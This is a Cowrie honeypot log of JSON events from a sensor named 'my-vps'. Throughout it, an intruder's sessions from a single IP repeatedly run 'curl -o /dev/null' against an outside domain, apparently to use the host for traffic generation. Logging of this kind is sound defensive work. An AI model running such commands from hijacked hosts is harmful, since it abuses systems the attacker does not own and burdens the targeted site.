{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.607466Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.612406Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.642042Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.642843Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.646076Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.647625Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.650092Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.650888Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.657996Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.659785Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.686902Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.687649Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.691575Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.695207Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.695824Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.697902Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.698704Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.704455Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.707804Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.733490Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.736467Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.737431Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.741312Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.742172Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.744413Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.745455Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.752002Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.754491Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.782524Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.783610Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.784199Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.788831Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.789841Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.791853Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.792746Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.795667Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.798624Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.802141Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.827252Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.827883Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.831423Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.832063Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.835138Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.837209Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.861945Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.862994Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.863443Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.866168Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.866796Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.869747Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.871320Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.872127Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.874608Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.876690Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.902695Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.903416Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.905869Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.906651Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.909814Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.911387Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.913358Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.914104Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.945002Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.945818Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.947782Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.948558Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.952519Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.953260Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.958110Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.961681Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.965504Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.992413Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.993162Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.995289Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.028641Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.031378Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.032173Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.070538Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.071399Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.074364Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.075116Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.081428Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.082962Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
